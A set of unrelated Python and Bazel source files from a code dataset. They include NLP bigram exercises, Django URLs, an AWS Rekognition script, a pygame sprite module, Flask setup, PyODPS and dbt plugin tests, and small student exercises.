Counter\r\nfrom functools import reduce\r\nfrom operator import add, mul\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\n\r\n#A \"movie comment\" language can be defined as\r\ncommenter = \"\"\"\r\nsentence = noun_phrase verb_phrase \r\nnoun_phrase = noun \r\nnoun = 这部电影 | 剧情 |故事\r\nverb_phrase = verb adj_phrase\r\nverb = 是 | 感觉 | 演的 \r\nadj_phrase = adj\r\nadj = 最好看 | 好看 | 不好看 |可以 |喜欢 | 很好看\r\n\r\n\"\"\"\r\n# create the rule of grammer of \"movie reviewer\" language\r\ndef create_grammar(grammar_str, split='=>', line_split='\\n'):\r\n grammar = {}\r\n for line in grammar_str.split(line_split):\r\n if not line.strip(): continue\r\n exp, stmt = line.split(split)\r\n grammar[exp.strip()] = [s.split() for s in stmt.split('|')]\r\n return grammar\r\n\r\nchoice = random.choice\r\n# randomly create a sentence based on rule given in the specific grammer\r\ndef generate(gram, target):\r\n if target not in gram: return target # means target is a terminal expression\r\n expaned = [generate(gram, t) for t in choice(gram[target])]\r\n return ' '.join([e if e != '/n' else '\\n' for e in expaned if e != 'null'])\r\n\r\nfilename = 'C:/Users/38079/OneDrive/桌面/NLP/Assignment/l1/movie_comments.csv'\r\ncontent = pd.read_csv(filename, encoding='UTF-8', low_memory=False)\r\n# print(content.head())\r\narticles = content['comment'].tolist()\r\n# print((articles[0]))\r\n\r\n#Remove special characters such as line breaks: use regular matching to directly extract words\r\ndef token(string):\r\n return re.findall('\\w+', string)\r\n\r\n# print(token(articles[1]))\r\n# print(list(jieba.cut(articles[110])))\r\n# with_jieba_cut = Counter(jieba.cut(articles[110]))\r\n# print(with_jieba_cut.most_common()[:10])\r\n# print(''.join(token(articles[110])))\r\n\r\n#Cleaning text\r\narticles_clean = [''.join(token(str(a)))for a in articles]\r\n# print(len(articles_clean))\r\n# print((articles_clean[1]))\r\n\r\n# Write plain text to txt\r\nwith open('article.txt', 'w', encoding='utf-8') as f:\r\n for a in articles_clean:\r\n f.write(a + '\\n')\r\n\r\n#Word segmentation\r\ndef cut(string): return list(jieba.cut(string))\r\nTOKEN = []\r\nfor i, line in enumerate((open('article.txt',encoding='utf-8'))):\r\n if i % 10000 == 0: print(i)\r\n if i > 20000: break \r\n TOKEN += cut(line)\r\n\r\nwords_count = Counter(TOKEN)# Do statistics\r\n#print(words_count.most_common(100))\r\nfrequiences = [f for w, f in words_count.most_common(100)]\r\nx = [i for i in range(100)]\r\n\r\n#Visualization (Plot the vocabulary frequency of the top 100 statistical results)\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(2,1,1) # 画2行1列个图形的第1个\r\nax2 = fig.add_subplot(2,1,2) # 画2行1列个图形的第2个\r\nax1.plot(x, frequiences)\r\n# print(plt.plot(x, np.log(frequiences)))\r\nax2.plot(x, np.log(frequiences))\r\nplt.show()\r\n\r\n# Probability of occurrence of a single word\r\n# def prob_1(word):\r\n# return words_count[word] / len(TOKEN)\r\n# print(prob_1('我们'))\r\nTOKEN[:10]\r\nTOKEN = [str(t) for t in TOKEN]\r\nTOKEN_2_GRAM = [''.join(TOKEN[i:i+2]) for i in range(len(TOKEN[:-2]))]\r\n# Concatenate adjacent words and store them in a list\r\nTOKEN_2_GRAM[:10]\r\nwords_count_2 = Counter(TOKEN_2_GRAM)\r\n\r\n# Probability of two consecutive words appearing\r\ndef prob_2(word1, word2):\r\n if word1 + word2 in words_count_2: return words_count_2[word1+word2] / len(TOKEN_2_GRAM)#pr(w1|w2)=pr(w1w2)/pr(w2)\r\n else:#out of vocabulary problem\r\n return 1 / len(TOKEN_2_GRAM)\r\n# print(prob_2('我们', '在'))\r\n\r\n# Get sentence probability\r\ndef get_probablity(sentence):\r\n words = cut(sentence)\r\n sentence_pro = 1\r\n for i, word in enumerate(words[:-1]):\r\n next_ = words[i+1]\r\n probability = prob_2(word, next_)\r\n sentence_pro *= probability\r\n return sentence_pro\r\n\r\n# Generate the most reasonable sentence\r\ndef generate_best(grammer):\r\n sentences=[]\r\n for sen in [generate(gram=grammer, target='sentence') for i in range(10)]:\r\n sentence=()\r\n sentence= (sen, get_probablity(sen))\r\n sentences.append(sentence)\r\n sentences=sorted(sentences, key=lambda x: x[1], reverse=True)\r\n print(sentences[0])\r\n\r\ngenerate_best(create_grammar(commenter, split='='))","sub_path":"Lab1/LanguageModel.py","file_name":"LanguageModel.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"259808208","text":"\"\"\"\n\nThis module contains the urls for projects app. In future, add any Url related to projects app here.\n\n\"\"\"\nfrom django.conf.urls import url\nfrom projects import views\n\nurlpatterns = [\n url(r'^user_dashboard$', views.project_member_view, name='user_dashboard'),\n url(r'^admin$', views.admin_projects_view, name='admin_projects'),\n url(r'^admin/user_mgmt$', views.user_mgmt, name='user_mgmt'),\n # Passing the project name as an argument to the view function\n url(r'^admin/(\\w+)$', views.admin_projects_edit_view, name='admin_projects_edit'),\n url(r'^admin/(\\w+)/info$', views.admin_projects_info_view, name='admin_projects_info'),\n url(r'^admin/(\\w+)/project_activity$', views.admin_projects_activity, name='admin_project_activity'),\n url(r'^admin/(\\w+)/edit_info$', views.admin_projects_edit_info, name='admin_projects_edit_info'),\n url(r'^admin/(\\w+)/lst_member$', views.list_project_members, name='list_project_members'),\n url(r'^admin/(\\w+)/add_member$', views.admin_projects_add_member, name='admin_projects_add_member'),\n url(r'^admin/(\\w+)/(\\w+)$', views.admin_projects_edit_member, name='admin_projects_edit_member'),\n url(r'^(\\w+)/info$', views.project_info_view, name='projects_info'),\n url(r'^\\w+/metadata$', views.project_info_view, name='projects_metadata'),\n # url(r'^\\w+/members$', views.project_view, name='projects_members'),\n\n]\n","sub_path":"projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"218732264","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# ライブラリをインポート\nimport time\nimport random\nimport boto3\n\n\ndef detect_text(image_path):\n \"\"\"\n AWSを使った画像中の文字を認識する関数\n \"\"\"\n \n # 画像認識の準備\n rekognition = boto3.client(service_name=\"rekognition\")\n with open(image_path, 'rb') as file:\n try:\n # 画像中から文字を認識\n detext_text_data = rekognition.detect_text(Image={'Bytes': file.read()})\n if len(detext_text_data[\"TextDetections\"]) != 0:\n # 認識結果から文字だけを取り出す\n text = detext_text_data[\"TextDetections\"][0][\"DetectedText\"]\n print(\"認識結果: {0}\".format(text))\n else:\n text = \"\"\n print(\"画像中に文字が検出されませんでした。\")\n except Exception as e:\n print(\"AWSが混み合っていますので、しばらくお待ちください。\")\n text = \"\"\n time.sleep(int(random.uniform(0, 5)))\n return text\n\nif __name__ == '__main__':\n # 画像のパス\n image_path = \"../img/forward.jpg\"\n # 画像中の文字を調べる\n text = detect_text(image_path)","sub_path":"AISystem2/scripts/aws_detect_text.py","file_name":"aws_detect_text.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"269822434","text":"# create a mapping of tags to integers\nfrom pandas import read_csv\n\n# create a mapping of tags to integers given the loaded mapping file\ndef create_tag_mapping(mapping_csv):\n\t# create a set of all known tags\n\tlabels = set()\n\tfor i in range(len(mapping_csv)):\n\t\t# convert spaced separated tags into an array of tags\n\t\ttags = mapping_csv['tags'][i].split(' ')\n\t\t# add tags to the set of known labels\n\t\tlabels.update(tags)\n\t# convert set of labels to a list to list\n\tlabels = list(labels)\n\t# order set alphabetically\n\tlabels.sort()\n\t# dict that maps labels to integers, and the reverse\n\tlabels_map = {labels[i]:i for i in range(len(labels))}\n\tinv_labels_map = {i:labels[i] for i in range(len(labels))}\n\treturn labels_map, inv_labels_map\n\n# load file as CSV\nfilename = 'train_v2.csv'\nmapping_csv = read_csv(filename)\n# create a mapping of tags to integers\nmapping, inv_mapping = create_tag_mapping(mapping_csv)\nprint(len(mapping))\nprint(mapping)","sub_path":"How_to_Deep_Learning_Computer_Vision/Mastery_Deep_Learning_Computer_Vision/code/chapter_22/03_map_tags_to_ints.py","file_name":"03_map_tags_to_ints.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"567418054","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 18 11:00:20 2019\r\n\r\n@author: Adit\r\n\"\"\"\r\n\r\n## Memotong Sinyal pada Node(Detik Ke-2)\r\n\r\nimport wfdb\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\nrecord = wfdb.rdrecord('Sinyal/101')\r\nrecord_dict = record.__dict__\r\nsinyal = record_dict['p_signal'][:,0]\r\n\r\nsinyal_satu_detik = sinyal\r\n\r\nfig,ax1 = plt.subplots(nrows=1)\r\nax1.plot(np.arange(720),signal[:720])\r\nplt.savefig('Sinyal.jpg')","sub_path":"ISYSRG BATCH 2_MRizkyAdityaUtama.py","file_name":"ISYSRG BATCH 2_MRizkyAdityaUtama.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"303478693","text":"import random\nimport itertools\nimport pygame as pg\n\nimport prepare\nimport tools\n\n\nSPRITE_SIZE = (32, 36)\n\n\nclass RPGSprite(pg.sprite.Sprite):\n \"\"\"Base class for player and AI sprites.\"\"\"\n def __init__(self, pos, speed, name, facing=\"DOWN\", *groups):\n super(RPGSprite, self).__init__(*groups)\n self.speed = speed\n self.name = name\n self.direction = facing\n self.old_direction = None \n self.direction_stack = [] \n self.redraw = True \n self.animate_timer = 0.0\n self.animate_fps = 10.0\n self.walkframes = None\n self.walkframe_dict = self.make_frame_dict(self.get_frames(name))\n self.adjust_images()\n self.rect = self.image.get_rect(center=pos)\n\n def get_frames(self, character):\n \"\"\"Get a list of all frames.\"\"\"\n sheet = prepare.GFX[character]\n all_frames = tools.split_sheet(sheet, SPRITE_SIZE, 3, 4)\n return all_frames\n\n def make_frame_dict(self, frames):\n \"\"\"Create a dictionary of animation cycles for each direction.\"\"\"\n frame_dict = {}\n for i,direct in enumerate(prepare.DIRECTIONS):\n frame_dict[direct] = itertools.cycle([frames[i][0], frames[i][2]])\n return frame_dict\n\n def adjust_images(self, now=0):\n \"\"\"Update the sprites walkframes as the sprite's direction changes.\"\"\"\n if self.direction != self.old_direction:\n self.walkframes = self.walkframe_dict[self.direction]\n self.old_direction = self.direction\n self.redraw = True\n self.make_image(now)\n\n def make_image(self, now):\n \"\"\"Update the sprite's animation as needed.\"\"\"\n if self.redraw or now-self.animate_timer > 1000/self.animate_fps:\n self.image = next(self.walkframes)\n self.animate_timer = now\n self.redraw = False\n\n def add_direction(self, direction):\n \"\"\"\n Add direction to the sprite's direction stack and change current\n direction.\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n self.direction_stack.append(direction)\n self.direction = direction\n\n def pop_direction(self, direction):\n \"\"\"\n Remove direction from direction stack and change current direction\n to the top of the stack (if not empty).\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n if self.direction_stack:\n self.direction = self.direction_stack[-1]\n\n def update(self, now, screen_rect):\n \"\"\"Update image and position of sprite.\"\"\"\n self.adjust_images(now)\n if self.direction_stack:\n direction_vector = prepare.DIRECT_DICT[self.direction]\n self.rect.x += self.speed*direction_vector[0]\n self.rect.y += self.speed*direction_vector[1]\n\n def draw(self, surface):\n \"\"\"Draw sprite to surface (not used if using group draw functions).\"\"\"\n surface.blit(self.image, self.rect)\n \n\nclass Player(RPGSprite):\n \"\"\"This class will represent the user controlled character.\"\"\"\n def __init__(self, pos, speed, name=\"warrior_m\", facing=\"DOWN\", *groups):\n super(Player, self).__init__(pos, speed, name, facing, *groups)\n\n def get_event(self, event):\n \"\"\"Handle events pertaining to player control.\"\"\"\n if event.type == pg.KEYDOWN:\n self.add_direction(event.key)\n elif event.type == pg.KEYUP:\n self.pop_direction(event.key)\n\n def update(self, now, screen_rect):\n \"\"\"Call base classes update method and clamp player to screen.\"\"\"\n super(Player, self).update(now, screen_rect)\n self.rect.clamp_ip(screen_rect)\n\n def add_direction(self, key):\n \"\"\"Remove direction from stack if corresponding key is released.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).add_direction(prepare.CONTROLS[key])\n\n def pop_direction(self, key):\n \"\"\"Add direction to stack if corresponding key is pressed.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).pop_direction(prepare.CONTROLS[key])\n\n\nclass AISprite(RPGSprite):\n \"\"\"A non-player controlled sprite.\"\"\"\n def __init__(self, pos, speed, name, facing, *groups):\n super(AISprite, self).__init__(pos, speed, name, facing, *groups)\n self.wait_range = (500, 2000)\n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = 0.0\n self.change_direction()\n\n def update(self, now, screen_rect):\n \"\"\"\n Choose a new direction if wait_time has expired or the sprite\n attempts to leave the screen.\n \"\"\"\n if now-self.wait_time > self.wait_delay:\n self.change_direction(now)\n super(AISprite, self).update(now, screen_rect)\n if not screen_rect.contains(self.rect):\n self.change_direction(now)\n self.rect.clamp_ip(screen_rect)\n\n def change_direction(self, now=0):\n \"\"\"\n Empty the stack and choose a new direction. The sprite may also\n choose not to go idle (choosing direction=None)\n \"\"\"\n self.direction_stack = []\n direction = random.choice(prepare.DIRECTIONS+(None,))\n if direction:\n super(AISprite, self).add_direction(direction)\n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = now\n","sub_path":"actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"400814048","text":"from model.emprestimo import Emprestimo\nfrom model.equipamento import Equipamento\n\nclass SolicitarEmprestimo(Emprestimo, Equipamento):\n def __init__(self, id, id_emprestimo, id_equipamento, id_usuario, dtSolicitacao, dtEmprestimo, dtDevolucao, status, nome, numeroMatricula, departamento, email, telefone, numeroEquipamento, marca, modelo, situacao):\n self.id = id\n self.id_emprestimo = id_emprestimo\n self.id_equipamento = id_equipamento\n \n Emprestimo.__init__(self, id, id_usuario, dtSolicitacao, dtEmprestimo, dtDevolucao, status, nome, numeroMatricula, departamento, email, telefone)\n Equipamento.__init__(self, id, numeroEquipamento, marca, modelo, situacao)\n \n def get_soli(self):\n return self.id, self.id_emprestimo, self.id_equipamento, self.id_usuario, self.dtSolicitacao, self.dtEmprestimo, self.dtDevolucao, self.status, self.nome, self.numeroMatricula, self.departamento, self.email, self.telefone, self.numeroEquipamento, self.marca, self.modelo, self.situacao\n #print(\"{}, {}, {}\".format(self.id, self.id_emprestimo, self.id_equipamento))\n\n def getDados(self):\n return self.id, self.id_emprestimo, self.id_equipamento, self.id_usuario, self.dtSolicitacao, self.dtEmprestimo, self.dtDevolucao, self.status, self.nome, self.numeroMatricula, self.departamento, self.email, self.telefone, self.numeroEquipamento, self.marca, self.modelo, self.situacao\n\n def __dict__(self):\n d = dict()\n d[\"id\"] = self.id\n d[\"id_emprestimo\"] = self.id_emprestimo\n d[\"id_equipamento\"] = self.id_equipamento\n d[\"id_usuario\"] = self.id_usuario\n d[\"dtSolicitacao\"] = self.dtSolicitacao\n d[\"dtEmprestimo\"] = self.dtEmprestimo\n d[\"dtDevolucao\"] = self.dtDevolucao\n d[\"status\"] = self.status\n d[\"nome\"] = self.nome\n d[\"numeroMatricula\"] = self.numeroMatricula\n d[\"departamento\"] = self.departamento\n d[\"email\"] = self.email\n d[\"telefone\"] = self.telefone\n d[\"numeroEquipamento\"] = self.numeroEquipamento\n d[\"marca\"] = self.marca\n d[\"modelo\"] = self.modelo\n d[\"situacao\"] = self.situacao \n return d\n\n @staticmethod\n def criar(dados):\n try:\n id = dados[\"id\"]\n id_emprestimo = dados[\"id_emprestimo\"]\n id_equipamento = dados[\"id_equipamento\"]\n id_usuario = dados[\"id_usuario\"]\n dtSolicitacao = dados[\"dtSolicitacao\"]\n dtEmprestimo = dados[\"dtEmprestimo\"]\n dtDevolucao = dados[\"dtDevolucao\"]\n status = dados[\"status\"]\n nome = dados[\"nome\"]\n numeroMatricula = dados[\"numeroMatricula\"]\n departamento = dados[\"departamento\"]\n email = dados[\"email\"]\n telefone = dados[\"telefone\"]\n numeroEquipamento = dados[\"numeroEquipamento\"]\n marca= dados[\"marca\"]\n modelo = dados[\"modelo\"]\n situacao = dados[\"situacao\"]\n return SolicitarEmprestimo(id=id, id_emprestimo=id_emprestimo, id_equipamento=id_equipamento, id_usuario=id_usuario, dtSolicitacao=dtSolicitacao, dtEmprestimo=dtEmprestimo, dtDevolucao=dtDevolucao, status=status, nome=nome, numeroMatricula=numeroMatricula, departamento=departamento, email=email, telefone=telefone, numeroEquipamento=numeroEquipamento, marca=marca, modelo=modelo, situacao=situacao)\n except Exception as e:\n print(\"Problema ao criar nova solicitação!\")\n print(e)","sub_path":"model/solicitarEmprestimo.py","file_name":"solicitarEmprestimo.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"589801713","text":"# -*- coding:utf-8 -*-\n\n\nfrom flask import (\n g,\n Flask,\n request\n)\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom poseidon.utils.token import TokenManager\nfrom poseidon.utils.sku import SkuManager\nfrom poseidon.settings import (\n MYSQL_CONFIG,\n REDIS_CONFIG,\n REDIS_TOKEN_EXPIRE,\n INIT_SKU\n)\n\napp = Flask(__name__)\n\n# sqlalchemy\napp.config['SQLALCHEMY_DATABASE_URI'] =\\\n 'mysql+pymysql://{username}:{password}@{host}:{port}/{database}'.format(\n **MYSQL_CONFIG)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SQLALCHEMY_POOL_RECYCLE'] = 1200\napp.config['SQLALCHEMY_POOL_SIZE'] = 10\napp.config['SQLALCHEMY_MAX_OVERFLOW'] = -1\ndb = SQLAlchemy(app)\n\n# redis token\ntoken_manager = TokenManager(REDIS_CONFIG, REDIS_TOKEN_EXPIRE)\n# redis sku\nsku_manager = SkuManager(INIT_SKU, REDIS_CONFIG)\n\n# from restful_doc import auto_doc\nfrom poseidon import api\n# api.api_init = auto_doc(app, True, 'docs/api_doc.md',\n# 'markdown')(api.api_init) #noqa\napp = api.api_init(app)\n\n# add ping\napp.route('/ping')(lambda: 'PONG')\n\n\n@app.before_request\ndef before_hook():\n token = request.headers.get('x-token')\n user_id = token_manager.get_user(token)\n if user_id:\n g.user_id = user_id\n","sub_path":"poseidon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"275207475","text":"def load_text_file(file_path):\n\t\"\"\"Summary\n\tLoad text file by lines\n\tArgs:\n\t file_path (String): \n\t\n\tReturns:\n\t list [String]: \n\t\"\"\"\n\twith open(file_path) as f:\n\t\tcontent = f.readlines()\n\tcontent = [x.strip() for x in content]\n\treturn content\n\n\n# file_path = \"../data/xiye_test_1/Orderline_id.dat\" \n# xd = load_text_file(file_path)\n# print(len(xd))\n\n# new_path = \"../data/xiye_test_1/Orderline_v.dat\" \n# with open(new_path, 'a') as f:\n# \tfor i in range(len(xd)):\n# \t\tf.write(str(i) + \"\\n\")\n# f.close()\n\n\n# a_list = [0, 1, 2, 3]\n# print(a_list.index(4))\n\n# import pickle\n\n# with open('asin_v', 'rb') as file:\n# \tasin = pickle.load(file)\n# with open('Orderline_v', 'rb') as file:\n# \tOrderline = pickle.load(file)\n# with open('Orderline_asin_table', 'rb') as file:\n# \tOrderline_asin_table = pickle.load(file)\n\n# for i in range(10):\n# \tprint(Orderline[i])\n\n# for i in range(10):\n# \tprint(asin[i])\n\n# for i in range(len(Orderline_asin_table)):\n# \tprint(Orderline_asin_table[i])\n\nprint(3 == None)\nprint(None == None)","sub_path":"src/tmp/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"523108934","text":"from .api import search\nimport sys\nimport json\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print(\"Search term needed!\")\n print(\"Usage: python -m duckduckgo_images_api TERM count(optional)\")\n else:\n count = 40\n if (len(sys.argv) > 2):\n count = int(sys.argv[2])\n print(json.dumps(search(sys.argv[1], count)))","sub_path":"duckduckgo_images_api/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"282783314","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright 1999-2017 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom collections import namedtuple\n\nfrom odps.config import options\nfrom odps.tests.core import TestBase, tn\nfrom odps.compat import unittest\nfrom odps.ipython.magics import ODPSSql\n\ntry:\n import IPython\n has_ipython = True\nexcept ImportError:\n has_ipython = False\n\n\nclass Test(TestBase):\n def setUp(self):\n super(Test, self).setUp()\n self.old_use_instance_tunnel = options.tunnel.use_instance_tunnel\n\n def tearDown(self):\n super(Test, self).tearDown()\n options.tunnel.use_instance_tunnel = self.old_use_instance_tunnel\n\n @unittest.skipIf(not has_ipython, 'Skipped when no IPython is detected.')\n def testExecuteSql(self):\n FakeShell = namedtuple('FakeShell', 'user_ns')\n\n magic_class = ODPSSql(FakeShell(user_ns={}))\n magic_class._odps = self.odps\n\n test_table_name = tn('pyodps_t_test_sql_magic')\n test_content = [['line1'], ['line2']]\n self.odps.delete_table(test_table_name, if_exists=True)\n self.odps.create_table(test_table_name, 'col string', lifecycle=1)\n self.odps.write_table(test_table_name, test_content)\n\n options.tunnel.use_instance_tunnel = False\n result = magic_class.execute('select * from %s' % test_table_name)\n self.assertListEqual(self._get_result(result), test_content)\n\n options.tunnel.use_instance_tunnel = True\n result = magic_class.execute('select * from %s' % test_table_name)\n self.assertListEqual(self._get_result(result), test_content)\n\n result = magic_class.execute('show tables')\n self.assertTrue(len(result) > 0)\n\n table_name = tn('pyodps_test_magics_create_table_result')\n magic_class.execute('create table %s (col string) lifecycle 1' % table_name)\n magic_class.execute('drop table %s' % table_name)\n","sub_path":"odps/ipython/tests/test_magics.py","file_name":"test_magics.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"178647401","text":"load(\"@npm//solc:index.bzl\", _solc_5 = \"solcjs\")\nload(\"@npm//solc4:index.bzl\", _solc_4 = \"solcjs\")\nload(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\n\ndef solc_contract(name, solc = _solc_5):\n src = name + \".sol\"\n baseFolder = \"decentraland/c2-data/contracts/\" + name\n folder = baseFolder + \"/\"\n file_prefix = folder.replace(\"/\", \"_\")\n internal_output = \"_internal_{}\".format(name)\n temp_bin = \"{0}_sol_{0}.bin\".format(name)\n temp_abi = \"{0}_sol_{0}.abi\".format(name)\n solc(\n name = internal_output,\n data = [\":\" + src],\n outs = [\n file_prefix + temp_abi,\n file_prefix + temp_bin,\n ],\n args = [folder + src, \"--bin\", \"--abi\", \"-o\", \"$(RULEDIR)\"],\n )\n abi_rulename = \"{}_abi\".format(name)\n final_abi = \"{}.abi\".format(name)\n abi_command = \"mv {} {}\".format(\"$(RULEDIR)/\" + file_prefix + temp_abi, \"$(RULEDIR)/\" + final_abi)\n native.genrule(\n name = abi_rulename,\n srcs = [\":\" + file_prefix + temp_abi],\n outs = [final_abi],\n tools = [\"@npm//solc\"],\n cmd = abi_command,\n )\n bin_rulename = \"{}_bin\".format(name)\n final_bin = \"{}.bin\".format(name)\n bin_command = \"mv {} {}\".format(\"$(RULEDIR)/\" + file_prefix + temp_bin, \"$(RULEDIR)/\" + final_bin)\n native.genrule(\n name = bin_rulename,\n srcs = [\":\" + file_prefix + temp_bin],\n outs = [final_bin],\n tools = [\"@npm//solc\"],\n cmd = bin_command,\n )\n","sub_path":"decentraland/c2-data/contracts/solc_contract.bzl","file_name":"solc_contract.bzl","file_ext":"bzl","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"291000238","text":"'''\nChecks if the function is a function\n'''\ndef isFunction(A, B, f):\n fun = True\n for x in A:\n count = 0\n if fun == True:\n for i in range(len(A)):\n if x == f[i][0]:\n count += 1\n if count > 1:\n fun = False\n break\n elif fun == False:\n break\n print(fun)\n\n'''\nPrints out the Domain's Range\n'''\ndef image(f):\n image = []\n for i in range(len(f)):\n if f[i][1] not in image:\n image.append(f[i][1])\n\n image = sorted(image)\n print(image)\n\n'''\nChecks if the function is One to One\n'''\ndef isOneToOne(A, B, f):\n oneToOne = True\n if len(A) > len(B):\n oneToOne = False\n elif len(B) >= len(A):\n for x in B:\n count = 0\n if oneToOne == True:\n for i in range(len(B)):\n if x == f[i][1]:\n count += 1\n if count > 1:\n oneToOne = False\n break\n elif oneToOne == False:\n break\n print(oneToOne)\n\n'''\nChecks if the function is Onto\n'''\ndef isOnto(A, B, f):\n onto = True\n if len(B) > len(A):\n onto = False\n elif len(A) >= len(B):\n for x in A:\n count = 0\n if onto == True:\n for i in range(len(A)):\n if x == f[i][0]:\n count += 1\n if count > 1:\n onto = False\n break\n elif onto == False:\n break\n print(onto)\n\n'''\nGives you the inverse of the function\n'''\ndef inverse(A, B, f):\n #Checks if the functionis an One to One function\n oneToOne = True\n if len(A) > len(B):\n oneToOne = False\n elif len(B) >= len(A):\n for x in B:\n count = 0\n if oneToOne == True:\n for i in range(len(B)):\n if x == f[i][1]:\n count += 1\n if count > 1:\n oneToOne = False\n break\n elif oneToOne == False:\n break\n\n #Checks if the function is an onto function\n onto = True\n if len(B) > len(A):\n onto = False\n elif len(A) >= len(B):\n for x in A:\n count = 0\n if onto == True:\n for i in range(len(A)):\n if x == f[i][0]:\n count += 1\n if count > 1:\n onto = False\n break\n elif onto == False:\n break\n\n #Reverses the list\n if (oneToOne == True) and (onto == True):\n inverse = []\n for i in range(len(f)):\n inverse.append(f[i][::-1])\n print(inverse)\n else:\n print(\"None\")\n\nA = [1, 2, 3]\nB = [4, 5]\nf = [[1, 4], [2, 5], [3, 4]]\nisFunction(A, B, f)\nimage(f)\nisOneToOne(A, B, f)\nisOnto(A, B, f)\ninverse(A, B, f)\n","sub_path":"Function.py","file_name":"Function.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"569518492","text":"import os\n\n\ndef create_file(file_path):\n file = open(file_path, 'w')\n file.close()\n return file\n\n\ndef add_file_content(file_path, content):\n with open(file_path, 'a') as file:\n file.write(content + '\\n')\n return file\n\n\ndef replace_file_string(file_path, old_string, new_string):\n if os.path.exists(file_path):\n with open(file_path, 'r') as file:\n data = file.read()\n data = data.replace(old_string, new_string)\n with open(file_path, 'w') as file:\n file.write(data)\n else:\n print('An error occurred')\n\n\ndef delete_file(file_path):\n try:\n os.remove(file_path)\n except FileNotFoundError:\n print('An error occurred')\n\n\ninput_data = input()\n\nwhile input_data != 'End':\n input_data = input_data.split('-')\n command = input_data[0]\n\n if command == 'Create':\n file_path = input_data[1]\n create_file(file_path)\n elif command == 'Add':\n file_path = input_data[1]\n content = input_data[2]\n add_file_content(file_path, content)\n elif command == 'Replace':\n file_path = input_data[1]\n old_string = input_data[2]\n new_string = input_data[3]\n replace_file_string(file_path, old_string, new_string)\n elif command == 'Delete':\n file_path = input_data[1]\n delete_file(file_path)\n input_data = input()\n","sub_path":"file_handling/exercise/file_manipulator.py","file_name":"file_manipulator.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"294449459","text":"import pytest\nfrom dbt.plugins import PluginManager, dbtPlugin, dbt_hook\nfrom dbt.plugins.manifest import PluginNodes, ModelNodeArgs\nfrom dbt.plugins.contracts import PluginArtifacts, PluginArtifact\n\n\nclass GetNodesPlugin(dbtPlugin):\n @dbt_hook\n def get_nodes(self) -> PluginNodes:\n nodes = PluginNodes()\n nodes.add_model(\n ModelNodeArgs(\n name=\"test_name\",\n package_name=self.project_name,\n identifier=\"test_identifier\",\n schema=\"test_schema\",\n )\n )\n return nodes\n\n\nclass GetArtifactsPlugin(dbtPlugin):\n @dbt_hook\n def get_manifest_artifacts(self, manifest) -> PluginArtifacts:\n return {self.project_name: PluginArtifact()}\n\n\nclass TestPluginManager:\n @pytest.fixture\n def get_nodes_plugin(self):\n return GetNodesPlugin(project_name=\"test\")\n\n @pytest.fixture\n def get_nodes_plugins(self, get_nodes_plugin):\n return [get_nodes_plugin, GetNodesPlugin(project_name=\"test2\")]\n\n @pytest.fixture\n def get_artifacts_plugin(self):\n return GetArtifactsPlugin(project_name=\"test\")\n\n @pytest.fixture\n def get_artifacts_plugins(self, get_artifacts_plugin):\n return [get_artifacts_plugin, GetArtifactsPlugin(project_name=\"test2\")]\n\n def 